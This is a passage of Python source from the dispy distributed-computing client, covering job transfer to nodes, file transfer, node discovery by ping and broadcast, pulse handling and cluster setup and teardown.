task=None): # generator compute.scheduler_ip_addr = self.scheduler_ip_addr compute.node_ip_addr = self.ip_addr compute.exclusive = exclusive reply = yield self.send(b'COMPUTE:' + serialize(compute), task=task) try: cpus = deserialize(reply) assert isinstance(cpus, int) and cpus > 0 except: logger.warning('Transfer of computation "%s" to %s failed', compute.name, self.ip_addr) raise StopIteration(-1) if not self.cpus: self.cpus = cpus for xf in compute.xfer_files: resp = yield self.xfer_file(xf, task=task) if resp != 0: logger.error('Could not transfer file "%s"', xf.name) raise StopIteration(resp) if isinstance(compute.setup, _Function): # set bigger timeout in case setup needs to load large files etc. resp = yield self.send(b'SETUP:' + serialize(compute.id), timeout=0, task=task) if resp != 0: logger.warning('Setup of computation "%s" on %s failed: %s', compute.name, self.ip_addr, resp) raise StopIteration(resp) self.last_pulse = time.time() raise StopIteration(0) def send(self, msg, reply=True, timeout=MsgTimeout, task=None): # generator sock = socket.socket(self.sock_family, socket.SOCK_STREAM) sock = AsyncSocket(sock, keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(timeout) try: yield sock.connect((self.ip_addr, self.port)) yield sock.sendall(self.auth) yield sock.send_msg(msg) if reply: resp = yield sock.recv_msg() else: resp = 0 except: logger.error('Could not connect to %s:%s, %s', self.ip_addr, self.port, traceback.format_exc()) # TODO: mark this node down, reschedule on different node? resp = traceback.format_exc() finally: sock.close() if resp == b'ACK': resp = 0 raise StopIteration(resp) def xfer_file(self, xf, task=None): # generator sock = socket.socket(self.sock_family, socket.SOCK_STREAM) sock = AsyncSocket(sock, keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(MsgTimeout) try: yield sock.connect((self.ip_addr, self.port)) yield sock.sendall(self.auth) yield sock.send_msg(b'FILEXFER:' + serialize(xf)) recvd = yield sock.recv_msg() recvd = deserialize(recvd) with open(xf.name, 'rb') as fd: sent = 0 while sent == recvd: data = fd.read(1024000) if not data: break yield sock.sendall(data) sent += len(data) recvd = yield sock.recv_msg() recvd = deserialize(recvd) if recvd == xf.stat_buf.st_size: resp = 0 else: resp = -1 except: logger.error('Could not transfer %s to %s', xf.name, self.ip_addr) # TODO: mark this node down, reschedule on different node? resp = -1 finally: sock.close() raise StopIteration(resp) def close(self, compute, terminate_pending=False, task=None): # generator logger.debug('Closing node %s for %s / %s', self.ip_addr, compute.name, compute.id) req = {'compute_id': compute.id, 'auth': compute.auth, 'node_ip_addr': self.ip_addr, 'terminate_pending': terminate_pending} try: yield self.send(b'CLOSE:' + serialize(req), reply=True, task=task) except: logger.debug('Deleting computation %s/%s from %s failed', compute.id, compute.name, self.ip_addr) class _DispyJob_(object): """Internal use only. """ __slots__ = ('job', 'uid', 'compute_id', 'hash', 'node', 'pinned', 'xfer_files', '_args', '_kwargs', 'code') def __init__(self, compute_id, args, kwargs): job_deps = kwargs.pop('dispy_job_depends', []) self.job = DispyJob(args, kwargs) self.job._dispy_job_ = self self._args = self.job._args self._kwargs = self.job._kwargs self.uid = None self.compute_id = compute_id self.hash = ''.join(hex(_)[2:] for _ in os.urandom(10)) self.node = None self.pinned = None self.xfer_files = [] self.code = '' depend_ids = set() cwd = os.getcwd() for dep in job_deps: if isinstance(dep, str) or inspect.ismodule(dep): if inspect.ismodule(dep): name = dep.__file__ if name.endswith('.pyc'): name = name[:-1] if not name.endswith('.py'): logger.warning('Invalid module "%s" - must be python source.', dep) continue if name.startswith(cwd): dst = os.path.dirname(name[len(cwd):].lstrip(os.sep)) elif dep.__package__: dst = dep.__package__.replace('.', os.sep) else: dst = os.path.dirname(dep.__name__.replace('.', os.sep)) else: name = os.path.abspath(dep) if name.startswith(cwd): dst = os.path.dirname(name[len(cwd):].lstrip(os.sep)) else: dst = '.' if name in depend_ids: continue self.xfer_files.append(_XferFile(name, dst, compute_id)) depend_ids.add(name) elif inspect.isfunction(dep) or inspect.isclass(dep) or hasattr(dep, '__class__'): if inspect.isfunction(dep) or inspect.isclass(dep): pass elif hasattr(dep, '__class__') and inspect.isclass(dep.__class__): dep = dep.__class__ if id(dep) in depend_ids: continue lines = inspect.getsourcelines(dep)[0] lines[0] = lines[0].lstrip() self.code += '\n' + ''.join(lines) depend_ids.add(id(dep)) else: logger.warning('Invalid job depends element "%s"; ignoring it.', dep) def __getstate__(self): state = {'uid': self.uid, 'hash': self.hash, 'compute_id': self.compute_id, '_args': self._args if isinstance(self._args, bytes) else serialize(self._args), '_kwargs': self._kwargs if isinstance(self._kwargs, bytes) else serialize(self._kwargs), 'xfer_files': self.xfer_files, 'code': self.code} return state def __setstate__(self, state): for k, v in state.items(): setattr(self, k, v) def __lt__(self, other): return self.uid < other.uid def __eq__(self, other): return isinstance(other, _DispyJob_) and self.uid == other.uid def run(self, task=None): # generator logger.debug('Running job %s on %s', self.uid, self.node.ip_addr) self.job.start_time = time.time() for xf in self.xfer_files: resp = yield self.node.xfer_file(xf, task=task) if resp: logger.warning('Transfer of file "%s" to %s failed', xf.name, self.node.ip_addr) raise Exception(-1) resp = yield self.node.send(b'JOB:' + serialize(self), task=task) # TODO: deal with NAKs (reschedule?) if resp != 0: logger.warning('Failed to run %s on %s: %s', self.uid, self.node.ip_addr, resp) raise Exception(str(resp)) raise StopIteration(resp) def finish(self, status): job = self.job job.status = status if status != DispyJob.ProvisionalResult: self.job._dispy_job_ = None self.job = None job.finish.set() class _JobReply(object): """Internal use only. """ def __init__(self, _job, ip_addr, status=None, keyfile=None, certfile=None): self.uid = _job.uid self.hash = _job.hash self.ip_addr = ip_addr self.status = status self.result = None self.stdout = None self.stderr = None self.exception = None self.start_time = 0 self.end_time = 0 class _Cluster(object, metaclass=Singleton): """Internal use only. """ _instance = None def __init__(self, ip_addr=None, ext_ip_addr=None, port=None, node_port=None, shared=False, secret='', keyfile=None, certfile=None, recover_file=None): if not hasattr(self, 'pycos'): self.pycos = Pycos() logger.info('dispy client version: %s', __version__) self.addrinfos = {} if isinstance(ip_addr, list): ip_addrs = ip_addr else: ip_addrs = [ip_addr] if isinstance(ext_ip_addr, list): ext_ip_addrs = ext_ip_addr else: ext_ip_addrs = [ext_ip_addr] for i in range(len(ip_addrs)): ip_addr = ip_addrs[i] if i < len(ext_ip_addrs): ext_ip_addr = ext_ip_addrs[i] else: ext_ip_addr = None addrinfo = node_addrinfo(ip_addr) if not addrinfo: logger.warning('Ignoring invalid ip_addr %s', ip_addr) continue if ext_ip_addr: ext_ip_addr = node_addrinfo(ext_ip_addr) if ext_ip_addr: ext_ip_addr = ext_ip_addr.ip else: logger.warning('Ignoring invalid ext_ip_addr %s', ext_ip_addrs[i]) if not ext_ip_addr: ext_ip_addr = addrinfo.ip addrinfo.ext_ip_addr = ext_ip_addr self.addrinfos[addrinfo.ext_ip_addr] = addrinfo if not self.addrinfos: raise Exception('No valid IP address found') if port: port = int(port) else: if shared: port = 0 else: port = 51347 self.port = port if node_port: node_port = int(node_port) else: node_port = 51348 self.node_port = node_port self._nodes = {} self.secret = secret self.keyfile = keyfile self.certfile = certfile self.shared = shared self.pulse_interval = None self.ping_interval = None self.poll_interval = None self.dest_path = os.getcwd() # TODO: make it an option? self._clusters = {} self._sched_jobs = {} self._sched_event = pycos.Event() self.terminate = False self.sign = hashlib.sha1(os.urandom(20)) for ext_ip_addr in self.addrinfos: self.sign.update(ext_ip_addr.encode()) self.sign = self.sign.hexdigest() self.auth = auth_code(self.secret, self.sign) if isinstance(recover_file, str): self.recover_file = recover_file else: now = datetime.datetime.now() self.recover_file = '_dispy_%.4i%.2i%.2i%.2i%.2i%.2i' % \ (now.year, now.month, now.day, now.hour, now.minute, now.second) atexit.register(self.shutdown) self.timer_task = Task(self.timer_proc) try: self.shelf = shelve.open(self.recover_file, flag='c', writeback=True) self.shelf['_cluster'] = {'ip_addrs': ip_addrs, 'ext_ip_addrs': ext_ip_addrs, 'port': self.port, 'sign': self.sign, 'secret': self.secret, 'auth': self.auth, 'keyfile': self.keyfile, 'certfile': self.certfile} self.shelf.sync() except: raise Exception('Could not create fault recover file "%s"' % self.recover_file) logger.info('Storing fault recovery information in "%s"', self.recover_file) self.select_job_node = self.load_balance_schedule self._scheduler = Task(self._schedule_jobs) self.start_time = time.time() self.compute_id = int(1000 * self.start_time) self.worker_Q = queue.Queue() self.worker_thread = threading.Thread(target=self.worker) self.worker_thread.daemon = True self.worker_thread.start() if self.shared: port_bound_event = None else: port_bound_event = pycos.Event() self.tcp_tasks = [] self.udp_tasks = [] for addrinfo in self.addrinfos.values(): self.tcp_tasks.append(Task(self.tcp_server, addrinfo, port_bound_event)) if self.shared: continue if os.name == 'nt': # Windows does not allow binding to a broadcast address bind_addr = addrinfo.ip else: if addrinfo.broadcast == '<broadcast>': # or addrinfo.broadcast == 'ff05::1' bind_addr = '' else: bind_addr = addrinfo.broadcast self.udp_tasks.append(Task(self.udp_server, bind_addr, addrinfo, port_bound_event)) # Under Windows dispynode may send objects with # '__mp_main__' scope, so make an alias to '__main__'. # TODO: Make alias even if client is not Windows? It is # possible the client is not Windows, but a node is. if os.name == 'nt' and '__mp_main__' not in sys.modules: sys.modules['__mp_main__'] = sys.modules['__main__'] def udp_server(self, bind_addr, addrinfo, port_bound_event, task=None): # generator task.set_daemon() udp_sock = AsyncSocket(socket.socket(addrinfo.family, socket.SOCK_DGRAM)) # udp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) if addrinfo.family == socket.AF_INET6: mreq = socket.inet_pton(addrinfo.family, addrinfo.broadcast) mreq += struct.pack('@I', addrinfo.ifn) udp_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq) while 1: try: udp_sock.bind((bind_addr, self.port)) except socket.error as exc: if exc.errno == errno.EADDRINUSE: logger.warning('Port %s seems to be used by another program ...', self.port) else: logger.warning('Error binding to port %s: %s ...', self.port, exc.errno) yield task.sleep(5) except: logger.warning('Could not bind to port %s: %s', self.port, traceback.format_exc()) yield task.sleep(5) else: break if addrinfo.family == socket.AF_INET6: try: udp_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1) except: pass port_bound_event.set() del port_bound_event while 1: try: msg, addr = yield udp_sock.recvfrom(1000) except GeneratorExit: break if msg.startswith(b'PING:'): try: info = deserialize(msg[len(b'PING:'):]) if info['version'] != _dispy_version: logger.warning('Ignoring %s due to version mismatch', addr[0]) continue assert info['port'] > 0 assert info['ip_addr'] # socket.inet_aton(status['ip_addr']) except: # logger.debug(traceback.format_exc()) logger.debug('Ignoring node %s', addr[0]) continue auth = auth_code(self.secret, info['sign']) node = self._nodes.get(info['ip_addr'], None) if node and node.auth == auth: continue sock = AsyncSocket(socket.socket(addrinfo.family, socket.SOCK_STREAM), keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(MsgTimeout) msg = {'version': _dispy_version, 'port': self.port, 'sign': self.sign, 'node_ip_addr': info['ip_addr']} msg['ip_addrs'] = [ai.ext_ip_addr for ai in self.addrinfos.values()] try: yield sock.connect((info['ip_addr'], info['port'])) yield sock.sendall(auth) yield sock.send_msg(b'PING:' + serialize(msg)) except GeneratorExit: break except: logger.debug(traceback.format_exc()) finally: sock.close() else: pass udp_sock.close() def tcp_server(self, addrinfo, port_bound_event, task=None): # generator task.set_daemon() if port_bound_event: yield port_bound_event.wait() del port_bound_event sock = AsyncSocket(socket.socket(addrinfo.family, socket.SOCK_STREAM), keyfile=self.keyfile, certfile=self.certfile) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) try: sock.bind((addrinfo.ip, self.port)) except: logger.warning('Could not bind TCP server to %s:%s', addrinfo.ip, self.port) raise StopIteration if not self.port: self.port = sock.getsockname()[1] logger.debug('dispy client at %s:%s', addrinfo.ip, self.port) sock.listen(128) if not self.shared: Task(self.broadcast_ping, [addrinfo]) while 1: try: conn, addr = yield sock.accept() except ssl.SSLError as err: logger.debug('SSL connection failed: %s', str(err)) continue except GeneratorExit: break except: logger.debug(traceback.format_exc()) continue Task(self.tcp_req, conn, addr) sock.close() def tcp_req(self, conn, addr, task=None): # generator conn.settimeout(MsgTimeout) msg = yield conn.recv_msg() if msg.startswith(b'JOB_REPLY:'): try: info = deserialize(msg[len(b'JOB_REPLY:'):]) except: logger.warning('Invalid job reply from %s:%s ignored', addr[0], addr[1]) else: yield self.job_reply_process(info, conn, addr) conn.close() elif msg.startswith(b'PULSE:'): msg = msg[len(b'PULSE:'):] try: info = deserialize(msg) node = self._nodes[info['ip_addr']] assert 0 <= info['cpus'] <= node.cpus node.last_pulse = time.time() yield conn.send_msg(b'PULSE') if info['avail_info']: node.avail_info = info['avail_info'] for cid in node.clusters: cluster = self._clusters[cid] if cluster.status_callback: dispy_node = cluster._dispy_nodes.get(node.ip_addr, None) if not dispy_node: continue dispy_node.avail_info = info['avail_info'] dispy_node.update_time = node.last_pulse self.worker_Q.put((cluster.status_callback, (DispyNode.AvailInfo, dispy_node, None))) except: logger.warning('Ignoring pulse message from %s', addr[0]) # logger.debug(traceback.format_exc()) conn.close() elif msg.startswith(b'JOB_STATUS:'): conn.close() # message from dispyscheduler try: info = deserialize(msg[len(b'JOB_STATUS:'):]) _job = self._sched_jobs[info['uid']] assert _job.hash == info['hash'] except: logger.warning('Invalid job status from %s:%s ignored', addr[0], addr[1]) else: job = _job.job job.status = info['status'] job.ip_addr = info['node'] node = self._nodes.get(job.ip_addr, None) # TODO: if node is None, likely missed NODE_STATUS, so create it now? if node: if job.status == DispyJob.Running: job.start_time = info['start_time'] node.busy += 1 else: logger.warning('Invalid job status for shared cluster: %s', job.status) cluster = self._clusters.get(_job.compute_id, None) if cluster: dispy_node = cluster._dispy_nodes.get(node.ip_addr, None) if dispy_node: if job.status == DispyJob.Running: dispy_node.busy += 1 dispy_node.update_time = time.time() if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (job.status, dispy_node, job))) elif msg.startswith(b'PONG:'): conn.close() try: info = deserialize(msg[len(b'PONG:'):]) if info['version'] != _dispy_version: logger.warning('Ignoring node %s due to version mismatch: %s != %s', info['ip_addr'], info['version'], _dispy_version) raise StopIteration assert info['auth'] == self.auth except (AssertionError): logger.warning('Ignoring node %s ("secret" mismatch)', addr[0]) except (Exception) as err: logger.warning('Ignoring node %s (%s: %s)', addr[0], err.__class__.__name__, err) else: self.add_node(info) elif msg.startswith(b'PING:'): sock_family = conn.family conn.close() try: info = deserialize(msg[len(b'PING:'):]) if info['version'] != _dispy_version: logger.warning('Ignoring %s due to version mismatch', addr[0]) raise StopIteration assert info['port'] > 0 assert info['ip_addr'] # socket.inet_aton(status['ip_addr']) except: # logger.debug(traceback.format_exc()) logger.debug('Ignoring node %s', addr[0]) raise StopIteration auth = auth_code(self.secret, info['sign']) node = self._nodes.get(info['ip_addr'], None) if node: if node.auth == auth: raise StopIteration sock = AsyncSocket(socket.socket(sock_family, socket.SOCK_STREAM), keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(MsgTimeout) msg = {'version': _dispy_version, 'port': self.port, 'sign': self.sign, 'node_ip_addr': info['ip_addr']} msg['ip_addrs'] = [addrinfo.ext_ip_addr for addrinfo in self.addrinfos.values()] try: yield sock.connect((info['ip_addr'], info['port'])) yield sock.sendall(auth) yield sock.send_msg(b'PING:' + serialize(msg)) except: logger.debug(traceback.format_exc()) finally: sock.close() elif msg.startswith(b'FILEXFER:'): try: xf = deserialize(msg[len(b'FILEXFER:'):]) msg = yield conn.recv_msg() job_reply = deserialize(msg) except: logger.debug(traceback.format_exc()) else: yield self.file_xfer_process(job_reply, xf, conn, addr) conn.close() elif msg.startswith(b'NODE_CPUS:'): conn.close() try: info = deserialize(msg[len(b'NODE_CPUS:'):]) node = self._nodes.get(info['ip_addr'], None) if not node: raise StopIteration auth = auth_code(self.secret, info['sign']) if auth != node.auth: logger.warning('Invalid signature from %s', node.ip_addr) raise StopIteration cpus = info['cpus'] except: raise StopIteration if cpus < 0: logger.warning('Node requested using %s CPUs, disabling it', node.ip_addr, cpus) cpus = 0 logger.debug('Setting cpus for %s to %s', node.ip_addr, cpus) # TODO: set node.cpus to min(cpus, node.cpus)? node.cpus = cpus if cpus > node.avail_cpus: node.avail_cpus = cpus node_computations = [] for cid, cluster in self._clusters.items(): if cid in node.clusters: continue compute = cluster._compute for node_alloc in cluster._node_allocs: cpus = node_alloc.allocate(cluster, node.ip_addr, node.name, node.avail_cpus, avail_info=node.avail_info, platform=node.platform) if cpus <= 0: continue node.cpus = min(node.avail_cpus, cpus) node_computations.append(compute) break if node_computations: Task(self.setup_node, node, node_computations) yield self._sched_event.set() else: node.avail_cpus = cpus for cid in node.clusters: cluster = self._clusters[cid] dispy_node = cluster._dispy_nodes.get(node.ip_addr, None) if dispy_node: dispy_node.cpus = cpus elif msg.startswith(b'TERMINATED:'): conn.close() try: info = deserialize(msg[len(b'TERMINATED:'):]) except: # logger.debug(traceback.format_exc()) pass else: node = self._nodes.pop(info['ip_addr'], None) if not node: raise StopIteration auth = auth_code(self.secret, info['sign']) if auth != node.auth: logger.warning('Invalid signature from %s', node.ip_addr) raise StopIteration logger.debug('Removing node %s', node.ip_addr) if node.clusters: dead_jobs = [_job for _job in self._sched_jobs.values() if _job.node is not None and _job.node.ip_addr == node.ip_addr] cids = list(node.clusters) node.clusters = set() for cid in cids: cluster = self._clusters.get(cid, None) if not cluster: continue dispy_node = cluster._dispy_nodes.pop(node.ip_addr, None) if not dispy_node: continue dispy_node.avail_cpus = dispy_node.cpus = dispy_node.busy = 0 if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyNode.Closed, dispy_node, None))) self.reschedule_jobs(dead_jobs) elif msg.startswith(b'NODE_STATUS:'): conn.close() # this message is from dispyscheduler for SharedJobCluster try: info = deserialize(msg[len(b'NODE_STATUS:'):]) cluster = self._clusters[info['compute_id']] assert info['auth'] == cluster._compute.auth except: logger.debug('Invalid node status from %s:%s ignored', addr[0], addr[1]) # logger.debug(traceback.format_exc()) else: if info['status'] == DispyNode.AvailInfo: dispy_node = cluster._dispy_nodes.get(info['ip_addr'], None) if dispy_node: dispy_node.avail_info = info['avail_info'] if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyNode.AvailInfo, dispy_node, None))) elif info['status'] == DispyNode.Initialized: dispy_node = info['dispy_node'] dispy_node.update_time = time.time() node = self._nodes.get(dispy_node.ip_addr, None) if node: node.name = dispy_node.name node.cpus = dispy_node.cpus else: node = _Node(dispy_node.ip_addr, 0, dispy_node.cpus, '', '', platform='') node.name = dispy_node.name self._nodes[node.ip_addr] = node cluster._dispy_nodes[dispy_node.ip_addr] = dispy_node if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyNode.Initialized, dispy_node, None))) elif info['status'] == DispyNode.Closed: dispy_node = cluster._dispy_nodes.get(info['ip_addr'], None) if dispy_node: dispy_node.avail_cpus = dispy_node.cpus = 0 if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyNode.Closed, dispy_node, None))) else: logger.warning('Invalid node status %s from %s:%s ignored', info['status'], addr[0], addr[1]) elif msg.startswith(b'SCHEDULED:'): try: info = deserialize(msg[len(b'SCHEDULED:'):]) assert self.shared cluster = self._clusters.get(info['compute_id'], None) assert info['pulse_interval'] is None or info['pulse_interval'] >= 1 self.pulse_interval = info['pulse_interval'] self.timer_task.resume(True) yield conn.send_msg(b'ACK') cluster._scheduled_event.set() except: yield conn.send_msg(b'NAK') conn.close() else: logger.warning('Invalid message from %s:%s ignored', addr[0], addr[1]) # logger.debug(traceback.format_exc()) conn.close() def timer_proc(self, task=None): task.set_daemon() reset = True last_pulse_time = last_ping_time = last_poll_time = time.time() timeout = None while 1: if reset: timeout = num_min(self.pulse_interval, self.ping_interval, self.poll_interval) try: reset = yield task.suspend(timeout) except GeneratorExit: break if reset: continue now = time.time() if self.pulse_interval and (now - last_pulse_time) >= self.pulse_interval: last_pulse_time = now if self.shared: clusters = list(self._clusters.values()) for cluster in clusters: msg = {'client_ip_addr': cluster._compute.scheduler_ip_addr, 'client_port': cluster._compute.job_result_port} sock = socket.socket(cluster.addrinfo.family, socket.SOCK_STREAM) sock = AsyncSocket(sock, keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(MsgTimeout) try: yield sock.connect((cluster.scheduler_ip_addr, cluster.scheduler_port)) yield sock.sendall(cluster._scheduler_auth) yield sock.send_msg(b'PULSE:' + serialize(msg)) except: pass sock.close() else: dead_nodes = {} for node in self._nodes.values(): if node.busy and node.last_pulse is not None and \ (node.last_pulse + (5 * self.pulse_interval)) <= now: logger.warning('Node %s is not responding; removing it (%s, %s, %s)', node.ip_addr, node.busy, node.last_pulse, now) dead_nodes[node.ip_addr] = node if dead_nodes: for node in dead_nodes.values(): cids = list(node.clusters) node.clusters = set() for cid in cids: cluster = self._clusters.get(cid, None) if not cluster: continue dispy_node = cluster._dispy_nodes.pop(node.ip_addr, None) if not dispy_node: continue dispy_node.avail_cpus = dispy_node.cpus = dispy_node.busy = 0 if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyNode.Closed, dispy_node, None))) del self._nodes[node.ip_addr] dead_jobs = [_job for _job in self._sched_jobs.values() if _job.node is not None and _job.node.ip_addr in dead_nodes] self.reschedule_jobs(dead_jobs) if self.ping_interval and (now - last_ping_time) >= self.ping_interval: last_ping_time = now for cluster in self._clusters.values(): self.send_ping_cluster(cluster) if self.poll_interval and (now - last_poll_time) >= self.poll_interval: last_poll_time = now for cluster in self._clusters.values(): Task(self.poll_job_results, cluster) def file_xfer_process(self, job_reply, xf, sock, addr): _job = self._sched_jobs.get(job_reply.uid, None) if _job is None or _job.hash != job_reply.hash: logger.warning('Ignoring invalid file transfer from job %s at %s', job_reply.uid, addr[0]) yield sock.send_msg(serialize(-1)) raise StopIteration node = self._nodes.get(job_reply.ip_addr, None) if node: node.last_pulse = time.time() tgt = os.path.join(self.dest_path, xf.dest_path.replace(xf.sep, os.sep), xf.name.split(xf.sep)[-1]) if not os.path.isdir(os.path.dirname(tgt)): os.makedirs(os.path.dirname(tgt)) with open(tgt, 'wb') as fd: recvd = 0 while recvd < xf.stat_buf.st_size: yield sock.send_msg(serialize(recvd)) data = yield sock.recvall(min(xf.stat_buf.st_size-recvd, 1024000)) if not data: break fd.write(data) recvd += len(data) yield sock.send_msg(serialize(recvd)) if recvd != xf.stat_buf.st_size: logger.warning('Transfer of file "%s" failed', tgt) # TODO: remove file? os.utime(tgt, (xf.stat_buf.st_atime, xf.stat_buf.st_mtime)) os.chmod(tgt, stat.S_IMODE(xf.stat_buf.st_mode)) def send_ping_node(self, ip_addr, port=None, task=None): ping_msg = {'version': _dispy_version, 'sign': self.sign, 'port': self.port, 'node_ip_addr': ip_addr} ping_msg['ip_addrs'] = [addrinfo.ext_ip_addr for addrinfo in self.addrinfos.values()] if not port: port = self.node_port if re.match('\d+\.', ip_addr): sock_family = socket.AF_INET else: sock_family = socket.AF_INET6 tcp_sock = AsyncSocket(socket.socket(sock_family, socket.SOCK_STREAM), keyfile=self.keyfile, certfile=self.certfile) tcp_sock.settimeout(MsgTimeout) try: yield tcp_sock.connect((ip_addr, port)) yield tcp_sock.sendall(b'x' * len(self.auth)) yield tcp_sock.send_msg(b'PING:' + serialize(ping_msg)) except: pass tcp_sock.close() def broadcast_ping(self, addrinfos=[], port=None, task=None): # generator if not port: port = self.node_port ping_msg = {'version': _dispy_version, 'sign': self.sign, 'port': self.port} ping_msg['ip_addrs'] = [addrinfo.ext_ip_addr for addrinfo in self.addrinfos.values()] if not addrinfos: addrinfos = self.addrinfos.values() for addrinfo in addrinfos: bc_sock = AsyncSocket(socket.socket(addrinfo.family, socket.SOCK_DGRAM)) bc_sock.settimeout(MsgTimeout) if addrinfo.family == socket.AF_INET: bc_sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) else: # addrinfo.family == socket.AF_INET6 bc_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, struct.pack('@i', 1)) bc_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_IF, addrinfo.ifn) bc_sock.bind((addrinfo.ip, 0)) try: yield bc_sock.sendto(b'PING:' + serialize(ping_msg), (addrinfo.broadcast, port)) except: pass bc_sock.close() def send_ping_cluster(self, cluster, task=None): for node_alloc in cluster._node_allocs: # TODO: we assume subnets are indicated by '*', instead of # subnet mask; this is a limitation, but specifying with # subnet mask a bit cumbersome. if node_alloc.ip_rex.find('*') >= 0: Task(self.broadcast_ping, port=node_alloc.port) else: ip_addr = node_alloc.ip_addr if ip_addr in cluster._dispy_nodes: continue port = node_alloc.port Task(self.send_ping_node, ip_addr, port) def poll_job_results(self, cluster, task=None): # generator for ip_addr in cluster._dispy_nodes: node = self._nodes.get(ip_addr, None) if not node or not node.port: continue sock = AsyncSocket(socket.socket(node.sock_family, socket.SOCK_STREAM), keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(MsgTimeout) try: req = {'compute_id': cluster._compute.id, 'auth': cluster._compute.auth} reply = yield node.send(b'PENDING_JOBS:' + serialize(req)) reply = deserialize(reply) except: logger.debug(traceback.format_exc()) continue finally: sock.close() for uid in reply['done']: _job = self._sched_jobs.get(uid, None) if _job is None: continue conn = AsyncSocket(socket.socket(node.sock_family, socket.SOCK_STREAM), keyfile=self.keyfile, certfile=self.certfile) conn.settimeout(MsgTimeout) try: yield conn.connect((node.ip_addr, node.port)) req = {'compute_id': cluster._compute.id, 'auth': cluster._compute.auth, 'uid': uid, 'hash': _job.hash} yield conn.sendall(node.auth) yield conn.send_msg(b'RETRIEVE_JOB:' + serialize(req)) reply = yield conn.recv_msg() reply = deserialize(reply) except: logger.debug(traceback.format_exc()) continue else: if isinstance(reply, _JobReply): yield self.job_reply_process(reply, conn, (node.ip_addr, node.port)) else: logger.debug('Invalid reply for %s', uid) finally: conn.close() def add_cluster(self, cluster, task=None): compute = cluster._compute if self.shared: self._clusters[compute.id] = cluster for xf in compute.xfer_files: xf.compute_id = compute.id node = _Node(cluster.scheduler_ip_addr, cluster.scheduler_port, 0, '', '', platform='', keyfile=self.keyfile, certfile=self.certfile) node.auth = cluster._scheduler_auth self._nodes[cluster.scheduler_ip_addr] = node dispy_node = DispyNode(cluster.scheduler_ip_addr, None, 0) dispy_node.avail_info = node.avail_info cluster._dispy_nodes[dispy_node.ip_addr] = dispy_node info = self.shelf['_cluster'] info['port'] = self.port self.shelf['_cluster'] = info info = {'name': compute.name, 'auth': compute.auth, 'nodes': [cluster.scheduler_ip_addr]} self.shelf['compute_%s' % compute.id] = info info = {'port': cluster.scheduler_port, 'auth': cluster._scheduler_auth, 'scheduler': True} self.shelf['node_%s' % (cluster.scheduler_ip_addr)] = info self.shelf.sync() if cluster.poll_interval: self.poll_interval = num_min(self.poll_interval, cluster.poll_interval) if self.poll_interval: self.timer_task.resume(True) raise StopIteration # if a node is added with 'allocate_node', compute is already # initialized, so don't reinitialize it if compute.id is None: compute.id = self.compute_id self.compute_id += 1 self._clusters[compute.id] = cluster for xf in compute.xfer_files: xf.compute_id = compute.id info = {'name': compute.name, 'auth': compute.auth, 'nodes': []} self.shelf['compute_%s' % compute.id] = info self.shelf.sync() if compute.pulse_interval: self.pulse_interval = num_min(self.pulse_interval, compute.pulse_interval) if cluster.ping_interval: self.ping_interval = num_min(self.ping_interval, cluster.ping_interval) if cluster.poll_interval: self.poll_interval = num_min(self.poll_interval, cluster.poll_interval) if self.pulse_interval or self.ping_interval or self.poll_interval: self.timer_task.resume(True) self.send_ping_cluster(cluster) compute_nodes = [] for ip_addr, node in self._nodes.items(): if compute.id in node.clusters: continue for node_alloc in cluster._node_allocs: cpus = node_alloc.allocate(cluster, node.ip_addr, node.name, node.avail_cpus, avail_info=node.avail_info, platform=node.platform) if cpus <= 0: continue node.cpus = min(node.avail_cpus, cpus) compute_nodes.append(node) for node in compute_nodes: Task(self.setup_node, node, [compute]) yield None def del_cluster(self, cluster, task=None): # generator if self._clusters.pop(cluster._compute.id, None) != cluster: logger.warning('Cluster %s already closed?', cluster._compute.name) raise StopIteration if self.shared: sock = socket.socket(cluster.addrinfo.family, socket.SOCK_STREAM) sock = AsyncSocket(sock, keyfile=self.keyfile, certfile=self.certfile) sock.settimeout(MsgTimeout) yield sock.connect((cluster.scheduler_ip_addr, cluster.scheduler_port)) yield sock.sendall(cluster._scheduler_auth) req = {'compute_id': cluster._compute.id, 'auth': cluster._compute.auth, 'terminate_pending': cluster._complete.is_set()} yield sock.send_msg(b'CLOSE:' + serialize(req)) sock.close() else: cid = cluster._compute.id cluster._jobs = [] cluster._pending_jobs = 0 # remove cluster from all nodes before closing (which uses # yield); otherwise, scheduler may access removed cluster # through node.clusters close_nodes = [] for dispy_node in cluster._dispy_nodes.values(): node = self._nodes.get(dispy_node.ip_addr, None) if not node: continue if not cluster._complete.is_set(): drop_jobs = [i for i, _job in enumerate(node.pending_jobs) if _job.compute_id == cid] for i in reversed(drop_jobs): node.pending_jobs.remove(i) node.clusters.discard(cid) close_nodes.append((Task(node.close, cluster._compute, terminate_pending=cluster._complete.is_set()), dispy_node)) cluster._dispy_nodes.clear() for close_task, dispy_node in close_nodes: yield close_task.finish() dispy_node.update_time = time.time() if cluster.status_callback: self.worker_Q.put((cluster.status_callback, (DispyNode.Closed, dispy_node, None))) self.shelf.pop('compute_%s' % (cluster._compute.id), None) # TODO: prune nodes in shelf self.shelf.sync() def setup_node(self, node, computations, task=None): # generator task.set_daemon() for compute in computations: # NB: to avoid computation being sent multiple times, we # add to cluster's _dispy_nodes before sending computation # to node cluster = self._clusters.get(compute.id, None) if not cluster or node.ip_addr in cluster._dispy_nodes: continue dispy_node = DispyNode(node.ip_addr, node.name, node.cpus) dispy_node.avail_cpus = node.avail_cpus dispy_node.avail_info = node.avail_info 